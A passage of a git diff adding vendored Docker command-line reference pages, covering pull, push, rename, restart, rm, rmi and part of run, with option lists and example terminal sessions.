bandwidth connection this may cause timeout issues and you may want to lower +this via the `--max-concurrent-downloads` daemon option. See the +[daemon documentation](dockerd.md) for more details. + +## Examples + +### Pull an image from Docker Hub + +To download a particular image, or set of images (i.e., a repository), use +`docker pull`. If no tag is provided, Docker Engine uses the `:latest` tag as a +default. This command pulls the `debian:latest` image: + +```bash +$ docker pull debian + +Using default tag: latest +latest: Pulling from library/debian +fdd5d7827f33: Pull complete +a3ed95caeb02: Pull complete +Digest: sha256:e7d38b3517548a1c71e41bffe9c8ae6d6d29546ce46bf62159837aad072c90aa +Status: Downloaded newer image for debian:latest +``` + +Docker images can consist of multiple layers. In the example above, the image +consists of two layers; `fdd5d7827f33` and `a3ed95caeb02`. + +Layers can be reused by images. For example, the `debian:jessie` image shares +both layers with `debian:latest`. Pulling the `debian:jessie` image therefore +only pulls its metadata, but not its layers, because all layers are already +present locally: + +```bash +$ docker pull debian:jessie + +jessie: Pulling from library/debian +fdd5d7827f33: Already exists +a3ed95caeb02: Already exists +Digest: sha256:a9c958be96d7d40df920e7041608f2f017af81800ca5ad23e327bc402626b58e +Status: Downloaded newer image for debian:jessie +``` + +To see which images are present locally, use the [`docker images`](images.md) +command: + +```bash +$ docker images + +REPOSITORY TAG IMAGE ID CREATED SIZE +debian jessie f50f9524513f 5 days ago 125.1 MB +debian latest f50f9524513f 5 days ago 125.1 MB +``` + +Docker uses a content-addressable image store, and the image ID is a SHA256 +digest covering the image's configuration and layers. In the example above, +`debian:jessie` and `debian:latest` have the same image ID because they are +actually the *same* image tagged with different names. Because they are the +same image, their layers are stored only once and do not consume extra disk +space. + +For more information about images, layers, and the content-addressable store, +refer to [understand images, containers, and storage drivers](https://docs.docker.com/engine/userguide/storagedriver/imagesandcontainers/). + + +## Pull an image by digest (immutable identifier) + +So far, you've pulled images by their name (and "tag"). Using names and tags is +a convenient way to work with images. When using tags, you can `docker pull` an +image again to make sure you have the most up-to-date version of that image. +For example, `docker pull ubuntu:14.04` pulls the latest version of the Ubuntu +14.04 image. + +In some cases you don't want images to be updated to newer versions, but prefer +to use a fixed version of an image. Docker enables you to pull an image by its +*digest*. When pulling an image by digest, you specify *exactly* which version +of an image to pull. Doing so, allows you to "pin" an image to that version, +and guarantee that the image you're using is always the same. + +To know the digest of an image, pull the image first. Let's pull the latest +`ubuntu:14.04` image from Docker Hub: + +```bash +$ docker pull ubuntu:14.04 + +14.04: Pulling from library/ubuntu +5a132a7e7af1: Pull complete +fd2731e4c50c: Pull complete +28a2f68d1120: Pull complete +a3ed95caeb02: Pull complete +Digest: sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 +Status: Downloaded newer image for ubuntu:14.04 +``` + +Docker prints the digest of the image after the pull has finished. In the example +above, the digest of the image is: + + sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 + +Docker also prints the digest of an image when *pushing* to a registry. This +may be useful if you want to pin to a version of the image you just pushed. + +A digest takes the place of the tag when pulling an image, for example, to +pull the above image by digest, run the following command: + +```bash +$ docker pull ubuntu@sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 + +sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2: Pulling from library/ubuntu +5a132a7e7af1: Already exists +fd2731e4c50c: Already exists +28a2f68d1120: Already exists +a3ed95caeb02: Already exists +Digest: sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 +Status: Downloaded newer image for ubuntu@sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 +``` + +Digest can also be used in the `FROM` of a Dockerfile, for example: + +```Dockerfile +FROM ubuntu@sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 +MAINTAINER some maintainer +``` + +> **Note**: Using this feature "pins" an image to a specific version in time. +> Docker will therefore not pull updated versions of an image, which may include +> security updates. If you want to pull an updated image, you need to change the +> digest accordingly. + + +## Pulling from a different registry + +By default, `docker pull` pulls images from [Docker Hub](https://hub.docker.com). It is also possible to +manually specify the path of a registry to pull from. For example, if you have +set up a local registry, you can specify its path to pull from it. A registry +path is similar to a URL, but does not contain a protocol specifier (`https://`). + +The following command pulls the `testing/test-image` image from a local registry +listening on port 5000 (`myregistry.local:5000`): + +```bash +$ docker pull myregistry.local:5000/testing/test-image +``` + +Registry credentials are managed by [docker login](login.md). + +Docker uses the `https://` protocol to communicate with a registry, unless the +registry is allowed to be accessed over an insecure connection. Refer to the +[insecure registries](dockerd.md#insecure-registries) section for more information. + + +## Pull a repository with multiple images + +By default, `docker pull` pulls a *single* image from the registry. A repository +can contain multiple images. To pull all images from a repository, provide the +`-a` (or `--all-tags`) option when using `docker pull`. + +This command pulls all images from the `fedora` repository: + +```bash +$ docker pull --all-tags fedora + +Pulling repository fedora +ad57ef8d78d7: Download complete +105182bb5e8b: Download complete +511136ea3c5a: Download complete +73bd853d2ea5: Download complete +.... + +Status: Downloaded newer image for fedora +``` + +After the pull has completed use the `docker images` command to see the +images that were pulled. The example below shows all the `fedora` images +that are present locally: + +```bash +$ docker images fedora + +REPOSITORY TAG IMAGE ID CREATED SIZE +fedora rawhide ad57ef8d78d7 5 days ago 359.3 MB +fedora 20 105182bb5e8b 5 days ago 372.7 MB +fedora heisenbug 105182bb5e8b 5 days ago 372.7 MB +fedora latest 105182bb5e8b 5 days ago 372.7 MB +``` + +## Canceling a pull + +Killing the `docker pull` process, for example by pressing `CTRL-c` while it is +running in a terminal, will terminate the pull operation. + +```bash +$ docker pull fedora + +Using default tag: latest +latest: Pulling from library/fedora +a3ed95caeb02: Pulling fs layer +236608c7b546: Pulling fs layer +^C +``` + +> **Note**: Technically, the Engine terminates a pull operation when the +> connection between the Docker Engine daemon and the Docker Engine client +> initiating the pull is lost. If the connection with the Engine daemon is +> lost for other reasons than a manual interaction, the pull is also aborted. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/push.md b/vendor/github.com/docker/docker/docs/reference/commandline/push.md new file mode 100644 index 0000000000..e36fd026d1 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/push.md @@ -0,0 +1,75 @@ +--- +title: "push" +description: "The push command description and usage" +keywords: "share, push, image" +--- + + + +# push + +```markdown +Usage: docker push [OPTIONS] NAME[:TAG] + +Push an image or a repository to a registry + +Options: + --disable-content-trust Skip image verification (default true) + --help Print usage +``` + +Use `docker push` to share your images to the [Docker Hub](https://hub.docker.com) +registry or to a self-hosted one. + +Refer to the [`docker tag`](tag.md) reference for more information about valid +image and tag names. + +Killing the `docker push` process, for example by pressing `CTRL-c` while it is +running in a terminal, terminates the push operation. + +Registry credentials are managed by [docker login](login.md). + +## Concurrent uploads + +By default the Docker daemon will push five layers of an image at a time. +If you are on a low bandwidth connection this may cause timeout issues and you may want to lower +this via the `--max-concurrent-uploads` daemon option. See the +[daemon documentation](dockerd.md) for more details. + +## Examples + +### Pushing a new image to a registry + +First save the new image by finding the container ID (using [`docker ps`](ps.md)) +and then committing it to a new image name. Note that only `a-z0-9-_.` are +allowed when naming images: + +```bash +$ docker commit c16378f943fe rhel-httpd +``` + +Now, push the image to the registry using the image ID. In this example the +registry is on host named `registry-host` and listening on port `5000`. To do +this, tag the image with the host name or IP address, and the port of the +registry: + +```bash +$ docker tag rhel-httpd registry-host:5000/myadmin/rhel-httpd +$ docker push registry-host:5000/myadmin/rhel-httpd +``` + +Check that this worked by running: + +```bash +$ docker images +``` + +You should see both `rhel-httpd` and `registry-host:5000/myadmin/rhel-httpd` +listed. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/rename.md b/vendor/github.com/docker/docker/docs/reference/commandline/rename.md new file mode 100644 index 0000000000..be035f1ce4 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/rename.md @@ -0,0 +1,27 @@ +--- +title: "rename" +description: "The rename command description and usage" +keywords: "rename, docker, container" +--- + + + +# rename + +```markdown +Usage: docker rename CONTAINER NEW_NAME + +Rename a container + +Options: + --help Print usage +``` + +The `docker rename` command allows the container to be renamed to a different name. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/restart.md b/vendor/github.com/docker/docker/docs/reference/commandline/restart.md new file mode 100644 index 0000000000..9f7ed00553 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/restart.md @@ -0,0 +1,26 @@ +--- +title: "restart" +description: "The restart command description and usage" +keywords: "restart, container, Docker" +--- + + + +# restart + +```markdown +Usage: docker restart [OPTIONS] CONTAINER [CONTAINER...] + +Restart one or more containers + +Options: + --help Print usage + -t, --time int Seconds to wait for stop before killing the container (default 10) +``` diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/rm.md new file mode 100644 index 0000000000..1c3e795933 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/rm.md @@ -0,0 +1,69 @@ +--- +title: "rm" +description: "The rm command description and usage" +keywords: "remove, Docker, container" +--- + + + +# rm + +```markdown +Usage: docker rm [OPTIONS] CONTAINER [CONTAINER...] + +Remove one or more containers + +Options: + -f, --force Force the removal of a running container (uses SIGKILL) + --help Print usage + -l, --link Remove the specified link + -v, --volumes Remove the volumes associated with the container +``` + +## Examples + + $ docker rm /redis + /redis + +This will remove the container referenced under the link +`/redis`. + + $ docker rm --link /webapp/redis + /webapp/redis + +This will remove the underlying link between `/webapp` and the `/redis` +containers removing all network communication. + + $ docker rm --force redis + redis + +The main process inside the container referenced under the link `/redis` will receive +`SIGKILL`, then the container will be removed. + + $ docker rm $(docker ps -a -q) + +This command will delete all stopped containers. The command +`docker ps -a -q` will return all existing container IDs and pass them to +the `rm` command which will delete them. Any running containers will not be +deleted. + + $ docker rm -v redis + redis + +This command will remove the container and any volumes associated with it. +Note that if a volume was specified with a name, it will not be removed. + + $ docker create -v awesome:/foo -v /bar --name hello redis + hello + $ docker rm -v hello + +In this example, the volume for `/foo` will remain intact, but the volume for +`/bar` will be removed. The same behavior holds for volumes inherited with +`--volumes-from`. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/rmi.md b/vendor/github.com/docker/docker/docs/reference/commandline/rmi.md new file mode 100644 index 0000000000..149b7635b6 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/rmi.md @@ -0,0 +1,83 @@ +--- +title: "rmi" +description: "The rmi command description and usage" +keywords: "remove, image, Docker" +--- + + + +# rmi + +```markdown +Usage: docker rmi [OPTIONS] IMAGE [IMAGE...] + +Remove one or more images + +Options: + -f, --force Force removal of the image + --help Print usage + --no-prune Do not delete untagged parents +``` + +You can remove an image using its short or long ID, its tag, or its digest. If +an image has one or more tag referencing it, you must remove all of them before +the image is removed. Digest references are removed automatically when an image +is removed by tag. + + $ docker images + REPOSITORY TAG IMAGE ID CREATED SIZE + test1 latest fd484f19954f 23 seconds ago 7 B (virtual 4.964 MB) + test latest fd484f19954f 23 seconds ago 7 B (virtual 4.964 MB) + test2 latest fd484f19954f 23 seconds ago 7 B (virtual 4.964 MB) + + $ docker rmi fd484f19954f + Error: Conflict, cannot delete image fd484f19954f because it is tagged in multiple repositories, use -f to force + 2013/12/11 05:47:16 Error: failed to remove one or more images + + $ docker rmi test1 + Untagged: test1:latest + $ docker rmi test2 + Untagged: test2:latest + + $ docker images + REPOSITORY TAG IMAGE ID CREATED SIZE + test latest fd484f19954f 23 seconds ago 7 B (virtual 4.964 MB) + $ docker rmi test + Untagged: test:latest + Deleted: fd484f19954f4920da7ff372b5067f5b7ddb2fd3830cecd17b96ea9e286ba5b8 + +If you use the `-f` flag and specify the image's short or long ID, then this +command untags and removes all images that match the specified ID. + + $ docker images + REPOSITORY TAG IMAGE ID CREATED SIZE + test1 latest fd484f19954f 23 seconds ago 7 B (virtual 4.964 MB) + test latest fd484f19954f 23 seconds ago 7 B (virtual 4.964 MB) + test2 latest fd484f19954f 23 seconds ago 7 B (virtual 4.964 MB) + + $ docker rmi -f fd484f19954f + Untagged: test1:latest + Untagged: test:latest + Untagged: test2:latest + Deleted: fd484f19954f4920da7ff372b5067f5b7ddb2fd3830cecd17b96ea9e286ba5b8 + +An image pulled by digest has no tag associated with it: + + $ docker images --digests + REPOSITORY TAG DIGEST IMAGE ID CREATED SIZE + localhost:5000/test/busybox sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf 4986bf8c1536 9 weeks ago 2.43 MB + +To remove an image using its digest: + + $ docker rmi localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf + Untagged: localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf + Deleted: 4986bf8c15363d1c5d15512d5266f8777bfba4974ac56e3270e7760f6f0a8125 + Deleted: ea13149945cb6b1e746bf28032f02e9b5a793523481a0a18645fc77ad53c4ea2 + Deleted: df7546f9f060a2268024c8a230d8639878585defcc1bc6f79d2728a13957871b diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/run.md b/vendor/github.com/docker/docker/docs/reference/commandline/run.md new file mode 100644 index 0000000000..e57ba4bbea --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/run.md @@ -0,0 +1,732 @@ +--- +title: "run" +description: "The run command description and usage" +keywords: "run, command, container" +--- + + + +# run + +```markdown +Usage: docker run [OPTIONS] IMAGE [COMMAND] [ARG...] + +Run a command in a new container + +Options: + --add-host value Add a custom host-to-IP mapping (host:ip) (default []) + -a, --attach value Attach to STDIN, STDOUT or STDERR (default []) + --blkio-weight value Block IO (relative weight), between 10 and 1000 + --blkio-weight-device value Block IO weight (relative device weight) (default []) + --cap-add value Add Linux capabilities (default []) + --cap-drop value Drop Linux capabilities (default []) + --cgroup-parent string Optional parent cgroup for the container + --cidfile string Write the container ID to the file + --cpu-count int The number of CPUs available for execution by the container. + Windows daemon only. On Windows Server containers, this is + approximated as a percentage of total CPU usage. + --cpu-percent int Limit percentage of CPU available for execution + by the container. Windows daemon only. + The processor resource controls are mutually + exclusive, the order of precedence is CPUCount + first, then CPUShares, and CPUPercent last. + --cpu-period int Limit CPU CFS (Completely Fair Scheduler) period + --cpu-quota int Limit CPU CFS (Completely Fair Scheduler) quota + -c, --cpu-shares int CPU shares (relative weight) + --cpus NanoCPUs Number of CPUs (default 0.000) + --cpu-rt-period int Limit the CPU real-time period in microseconds + --cpu-rt-runtime int Limit the CPU real-time runtime in microseconds + --cpuset-cpus string CPUs in which to allow execution (0-3, 0,1) + --cpuset-mems string MEMs in which to allow execution (0-3, 0,1) + -d, --detach Run container in background and print container ID + --detach-keys string Override the key sequence for detaching a container + --device value Add a host device to the container (default []) + --device-read-bps value Limit read rate (bytes per second) from a device (default []) + --device-read-iops value Limit read rate (IO per second) from a device (default []) + --device-write-bps value Limit write rate (bytes per second) to a device (default []) + --device-write-iops value Limit write rate (IO per second) to a device (default []) + --disable-content-trust Skip image verification (default true) + --dns value Set custom DNS servers (default []) + --dns-option value Set DNS options (default []) + --dns-search value Set custom DNS search domains (default []) + --entrypoint string Overwrite the default ENTRYPOINT of the image + -e, --env value Set environment variables (default []) + --env-file value Read in a file of environment variables (default []) + --expose value Expose a port or a range of ports (default []) + --group-add value Add additional groups to join (default []) + --health-cmd string Command to run to check health + --health-interval duration Time between running the check (ns|us|ms|s|m|h) (default 0s) + --health-retries int Consecutive failures needed to report unhealthy + --health-timeout duration Maximum time to allow one check to run (ns|us|ms|s|m|h) (default 0s) + --help Print usage + -h, --hostname string Container host name + --init Run an init inside the container that forwards signals and reaps processes + --init-path string Path to the docker-init binary + -i, --interactive Keep STDIN open even if not attached + --io-maxbandwidth string Maximum IO bandwidth limit for the system drive (Windows only) + (Windows only). The format is ``. + Unit is optional and can be `b` (bytes per second), + `k` (kilobytes per second), `m` (megabytes per second), + or `g` (gigabytes per second). If you omit the unit, + the system uses bytes per second. + --io-maxbandwidth and --io-maxiops are mutually exclusive options. + --io-maxiops uint Maximum IOps limit for the system drive (Windows only) + --ip string Container IPv4 address (e.g. 172.30.100.104) + --ip6 string Container IPv6 address (e.g. 2001:db8::33) + --ipc string IPC namespace to use + --isolation string Container isolation technology + --kernel-memory string Kernel memory limit + -l, --label value Set meta data on a container (default []) + --label-file value Read in a line delimited file of labels (default []) + --link value Add link to another container (default []) + --link-local-ip value Container IPv4/IPv6 link-local addresses (default []) + --log-driver string Logging driver for the container + --log-opt value Log driver options (default []) + --mac-address string Container MAC address (e.g. 92:d0:c6:0a:29:33) + -m, --memory string Memory limit + --memory-reservation string Memory soft limit + --memory-swap string Swap limit equal to memory plus swap: '-1' to enable unlimited swap + --memory-swappiness int Tune container memory swappiness (0 to 100) (default -1) + --name string Assign a name to the container + --network-alias value Add network-scoped alias for the container (default []) + --network string Connect a container to a network + 'bridge': create a network stack on the default Docker bridge + 'none': no networking + 'container:': reuse another container's network stack + 'host': use the Docker host network stack + '|': connect to a user-defined network + --no-healthcheck Disable any container-specified HEALTHCHECK + --oom-kill-disable Disable OOM Killer + --oom-score-adj int Tune host's OOM preferences (-1000 to 1000) + --pid string PID namespace to use + --pids-limit int Tune container pids limit (set -1 for unlimited) + --privileged Give extended privileges to this container + -p, --publish value Publish a container's port(s) to the host (default []) + -P, --publish-all Publish all exposed ports to random ports + --read-only Mount the container's root filesystem as read only + --restart string Restart policy to apply when a container exits (default "no") + Possible values are : no, on-failure[:max-retry], always, unless-stopped + --rm Automatically remove the container when it exits + --runtime string Runtime to use for this container + --security-opt value Security Options (default []) + --shm-size string Size of /dev/shm, default value is 64MB. + The format is ``. `number` must be greater than `0`. + Unit is optional and can be `b` (bytes), `k` (kilobytes), `m` (megabytes), + or `g` (gigabytes). If you omit the unit, the system uses bytes. + --sig-proxy Proxy received signals to the process (default true) + --stop-signal string Signal to stop a container, SIGTERM by default (default "SIGTERM") + --stop-timeout=10 Timeout (in seconds) to stop a container + --storage-opt value Storage driver options for the container (default []) + --sysctl value Sysctl options (default map[]) + --tmpfs value Mount a tmpfs directory (default []) + -t, --tty Allocate a pseudo-TTY + --ulimit value Ulimit options (default []) + -u, --user string Username or UID (format: [:]) + --userns string User namespace to use + 'host': Use the Docker host user namespace + '': Use the Docker daemon user namespace specified by `--userns-remap` option. + --uts string UTS namespace to use + -v, --volume value Bind mount a volume (default []). The format + is `[host-src:]container-dest[:]`. + The comma-delimited `options` are [rw|ro], + [z|Z], [[r]shared|[r]slave|[r]private], and + [nocopy]. The 'host-src' is an absolute path + or a name value. + --volume-driver string Optional volume driver for the container + --volumes-from value Mount volumes from the specified container(s) (default []) + -w, --workdir string Working directory inside the container +``` + +The `docker run` command first `creates` a writeable container layer over the +specified image, and then `starts` it using the specified command. That is, +`docker run` is equivalent to the API `/containers/create` then +`/containers/(id)/start`. A stopped container can be restarted with all its +previous changes intact using `docker start`. See `docker ps -a` to view a list +of all containers. + +The `docker run` command can be used in combination with `docker commit` to +[*change the command that a container runs*](commit.md). There is additional detailed information about `docker run` in the [Docker run reference](../run.md). + +For information on connecting a container to a network, see the ["*Docker network overview*"](https://docs.docker.com/engine/userguide/networking/). + +## Examples + +### Assign name and allocate pseudo-TTY (--name, -it) + + $ docker run --name test -it debian + root@d6c0fe130dba:/# exit 13 + $ echo $? + 13 + $ docker ps -a | grep test + d6c0fe130dba debian:7 "/bin/bash" 26 seconds ago Exited (13) 17 seconds ago test + +This example runs a container named `test` using the `debian:latest` +image. The `-it` instructs Docker to allocate a pseudo-TTY connected to +the container's stdin; creating an interactive `bash` shell in the container. +In the example, the `bash` shell is quit by entering +`exit 13`. This exit code is passed on to the caller of +`docker run`, and is recorded in the `test` container's metadata. + +### Capture container ID (--cidfile) + + $ docker run --cidfile /tmp/docker_test.cid ubuntu echo "test" + +This will create a container and print `test` to the console. The `cidfile` +flag makes Docker attempt to create a new file and write the container ID to it. +If the file exists already, Docker will return an error. Docker will close this +file when `docker run` exits. + +### Full container capabilities (--privileged) + + $ docker run -t -i --rm ubuntu bash + root@bc338942ef20:/# mount -t tmpfs none /mnt + mount: permission denied + +This will *not* work, because by default, most potentially dangerous kernel +capabilities are dropped; including `cap_sys_admin` (which is required to mount +filesystems). However, the `--privileged` flag will allow it to run: + + $ docker run -t -i --privileged ubuntu bash + root@50e3f57e16e6:/# mount -t tmpfs none /mnt + root@50e3f57e16e6:/# df -h + Filesystem Size Used Avail Use% Mounted on + none 1.9G 0 1.9G 0% /mnt + +The `--privileged` flag gives *all* capabilities to the container, and it also +lifts all the limitations enforced by the `device` cgroup controller. In other +words, the container can then do almost everything that the host can do. This +flag exists to allow special use-cases, like running Docker within Docker. + +### Set working directory (-w) + + $ docker run -w /path/to/dir/ -i -t ubuntu pwd + +The `-w` lets the command being executed inside directory given, here +`/path/to/dir/`. If the path does not exist it is created inside the container. + +### Set storage driver options per container + + $ docker run -it --storage-opt size=120G fedora /bin/bash + +This (size) will allow to set the container rootfs size to 120G at creation time. +This option is only available for the `devicemapper`, `btrfs`, `overlay2`, +`windowsfilter` and `zfs` graph drivers. +For the `devicemapper`, `btrfs`, `windowsfilter` and `zfs` graph drivers, +user cannot pass a size less than the Default BaseFS Size. +For the `overlay2` storage driver, the size option is only available if the +backing fs is `xfs` and mounted with the `pquota` mount option. +Under these conditions, user can pass any size less then the backing fs size. + +### Mount tmpfs (--tmpfs) + + $ docker run -d --tmpfs /run:rw,noexec,nosuid,size=65536k my_image + +The `--tmpfs` flag mounts an empty tmpfs into the container with the `rw`, +`noexec`, `nosuid`, `size=65536k` options. + +### Mount volume (-v, --read-only) + + $ docker run -v `pwd`:`pwd` -w `pwd` -i -t ubuntu pwd + +The `-v` flag mounts the current working directory into the container. The `-w` +lets the command being executed inside the current working directory, by +changing into the directory to the value returned by `pwd`. So this +combination executes the command using the container, but inside the +current working directory. + + $ docker run -v /doesnt/exist:/foo -w /foo -i -t ubuntu bash + +When the host directory of a bind-mounted volume doesn't exist, Docker +will automatically create this directory on the host for you. In the +example above, Docker will create the `/doesnt/exist` +folder before starting your container. + + $ docker run --read-only -v /icanwrite busybox touch /icanwrite/here + +Volumes can be used in combination with `--read-only` to control where +a container writes files. The `--read-only` flag mounts the container's root +filesystem as read only prohibiting writes to locations other than the +specified volumes for the container. + + $ docker run -t -i -v /var/run/docker.sock:/var/run/docker.sock -v /path/to/static-docker-binary:/usr/bin/docker busybox sh + +By bind-mounting the docker unix socket and statically linked docker +binary (refer to [get the linux binary]( +https://docs.docker.com/engine/installation/binaries/#/get-the-linux-binary)), +you give the container the full access to create and manipulate the host's +Docker daemon. + +On Windows, the paths must be specified using Windows-style semantics. + + PS C:\> docker run -v c:\foo:c:\dest microsoft/nanoserver cmd /s /c type c:\dest\somefile.txt + Contents of file + + PS C:\> docker run -v c:\foo:d: microsoft/nanoserver cmd /s /c type d:\somefile.txt + Contents of file + +The following examples will fail when using Windows-based containers, as the +destination of a volume or bind-mount inside the container must be one of: +a non-existing or empty directory; or a drive other than C:. Further, the source +of a bind mount must be a local directory, not a file. + + net use z: \\remotemachine\share + docker run -v z:\foo:c:\dest ... + docker run -v \\uncpath\to\directory:c:\dest ... + docker run -v c:\foo\somefile.txt:c:\dest ... + docker run -v c:\foo:c: ... + docker run -v c:\foo:c:\existing-directory-with-contents ... + +For in-depth information about volumes, refer to [manage data in containers](https://docs.docker.com/engine/tutorials/dockervolumes/) + +### Publish or expose port (-p, --expose) + + $ docker run -p 127.0.0.1:80:8080 ubuntu bash + +This binds port `8080` of the container to port `80` on `127.0.0.1` of the host +machine. The [Docker User +Guide](https://docs.docker.com/engine/userguide/networking/default_network/dockerlinks/) +explains in detail how to manipulate ports in Docker. + + $ docker run --expose 80 ubuntu bash + +This exposes port `80` of the container without publishing the port to the host +system's interfaces. + +### Set environment variables (-e, --env, --env-file) + + $ docker run -e MYVAR1 --env MYVAR2=foo --env-file ./env.list ubuntu bash + +This sets simple (non-array) environmental variables in the container. For +illustration all three +flags are shown here. Where `-e`, `--env` take an environment variable and +value, or if no `=` is provided, then that variable's current value, set via +`export`, is passed through (i.e. `$MYVAR1` from the host is set to `$MYVAR1` +in the container). When no `=` is provided and that variable is not defined +in the client's environment then that variable will be removed from the +container's list of environment variables. All three flags, `-e`, `--env` and +`--env-file` can be repeated. + +Regardless of the order of these three flags, the `--env-file` are processed +first, and then `-e`, `--env` flags. This way, the `-e` or `--env` will +override variables as needed. + + $ cat ./env.list + TEST_FOO=BAR + $ docker run --env TEST_FOO="This is a test" --env-file ./env.list busybox env | grep TEST_FOO + TEST_FOO=This is a test + +The `--env-file` flag takes a filename as an argument and expects each line +to be in the `VAR=VAL` format, mimicking the argument passed to `--env`. Comment +lines need only be prefixed with `#` + +An example of a file passed with `--env-file` + + $ cat ./env.list + TEST_FOO=BAR + + # this is a comment + TEST_APP_DEST_HOST=10.10.0.127 + TEST_APP_DEST_PORT=8888 + _TEST_BAR=FOO + TEST_APP_42=magic + helloWorld=true + 123qwe=bar + org.spring.config=something + + # pass through this variable from the caller + TEST_PASSTHROUGH + $ TEST_PASSTHROUGH=howdy docker run --env-file ./env.list busybox env + PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin + HOSTNAME=5198e0745561 + TEST_FOO=BAR + TEST_APP_DEST_HOST=10.10.0.127 + TEST_APP_DEST_PORT=8888 + _TEST_BAR=FOO + TEST_APP_42=magic + helloWorld=true + TEST_PASSTHROUGH=howdy + HOME=/root + 123qwe=bar + org.spring.config=something + + $ docker run --env-file ./env.list busybox env + PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin + HOSTNAME=5198e0745561 + TEST_FOO=BAR + TEST_APP_DEST_HOST=10.10.0.127 + TEST_APP_DEST_PORT=8888 + _TEST_BAR=FOO + TEST_APP_42=magic + helloWorld=true + TEST_PASSTHROUGH= + HOME=/root + 123qwe=bar + org.spring.config=something + +### Set metadata on container (-l, --label, --label-file) + +A label is a `key=value` pair that applies metadata to a container. To label a container with two labels: + + $ docker run -l my-label --label com.example.foo=bar ubuntu bash + +The `my-label` key doesn't specify a value so the label defaults to an empty +string(`""`). To add multiple labels, repeat the label flag (`-l` or `--label`). + +The `key=value` must be unique to avoid overwriting the label value. If you +specify labels with identical keys but different values, each subsequent value +overwrites the previous. Docker uses the last `key=value` you supply. + +Use the `--label-file` flag to load multiple labels from a file. Delimit each +label in the file with an EOL mark. The example below loads labels from a +labels file in the current directory: + + $ docker run --label-file ./labels ubuntu bash + +The label-file format is similar to the format for loading environment +variables. (Unlike environment variables, labels are not visible to processes +running inside a container.) The following example illustrates a label-file +format: + + com.example.label1="a label" + + # this is a comment + com.example.label2=another\ label + com.example.label3 + +You can load multiple label-files by supplying multiple `--label-file` flags. + +For additional information on working with labels, see [*Labels - custom +metadata in Docker*](https://docs.docker.com/engine/userguide/labels-custom-metadata/) in the Docker User +Guide. + +### Connect a container to a network (--network) + +When you start a container use the `--network` flag to connect it to a network. +This adds the `busybox` container to the `my-net` network. + +```bash +$ docker run -itd --network=my-net busybox +``` + +You can also choose the IP addresses for the container with `--ip` and `--ip6` +flags when you start the container on a user-defined network. + +```bash +$ docker run -itd --network=my-net --ip=10.10.9.75 busybox +``` + +If you want to add a running container to a network use the `docker network connect` subcommand. + +You can connect multiple containers to the same network. Once connected, the +containers can communicate easily need only another container's IP address +or name. For `overlay` networks or custom plugins that support multi-host +connectivity, containers connected to the same multi-host network but launched +from different Engines can also communicate in this way. + +**Note**: Service discovery is unavailable on the default bridge network. +Containers can communicate via their IP addresses by default. To communicate +by name, they must be linked. + +You can disconnect a container from a network using the `docker network +disconnect` command. + +### Mount volumes from container (--volumes-from) + + $ docker run --volumes-from 777f7dc92da7 --volumes-from ba8c0c54f0f2:ro -i -t ubuntu pwd + +The `--volumes-from` flag mounts all the defined volumes from the referenced +containers. Containers can be specified by repetitions of the `--volumes-from` +argument. The container ID may be optionally suffixed with `:ro` or `:rw` to +mount the volumes in read-only or read-write mode, respectively. By default, +the volumes are mounted in the same mode (read write or read only) as +the reference container. + +Labeling systems like SELinux require that proper labels are placed on volume +content mounted into a container. Without a label, the security system might +prevent the processes running inside the container from using the content. By +default, Docker does not change the labels set by the OS. + +To change the label in the container context, you can add either of two suffixes +`:z` or `:Z` to the volume mount. These suffixes tell Docker to relabel file +objects on the shared volumes. The `z` option tells Docker that two containers +share the volume content. As a result, Docker labels the content with a shared +content label. Shared volume labels allow all containers to read/write content. +The `Z` option tells Docker to label the content with a private unshared label. +Only the current container can use a private volume. + +### Attach to STDIN/STDOUT/STDERR (-a) + +The `-a` flag tells `docker run` to bind to the container's `STDIN`, `STDOUT` +or `STDERR`. This makes it possible to manipulate the output and input as +needed. + + $ echo "test" | docker run -i -a stdin ubuntu cat - + +This pipes data into a container and prints the container's ID by attaching +only to the container's `STDIN`. + + $ docker run -a stderr ubuntu echo test + +This isn't going to print anything unless there's an error because we've +only attached to the `STDERR` of the container. The container's logs +still store what's been written to `STDERR` and `STDOUT`. + + $ cat somefile | docker run -i -a stdin mybuilder dobuild + +This is how piping a file into a container could be done for a build. +The container's ID will be printed after the build is done and the build +logs could be retrieved using `docker logs`. This is +useful if you need to pipe a file or something else into a container and +retrieve the container's ID once the container has finished running. + +### Add host device to container (--device) + + $ docker run --device=/dev/sdc:/dev/xvdc --device=/dev/sdd --device=/dev/zero:/dev/nulo -i -t ubuntu ls -l /dev/{xvdc,sdd,nulo} + brw-rw---- 1 root disk 8, 2 Feb 9 16:05 /dev/xvdc + brw-rw---- 1 root disk 8, 3 Feb 9 16:05 /dev/sdd + crw-rw-rw- 1 root root 1, 5 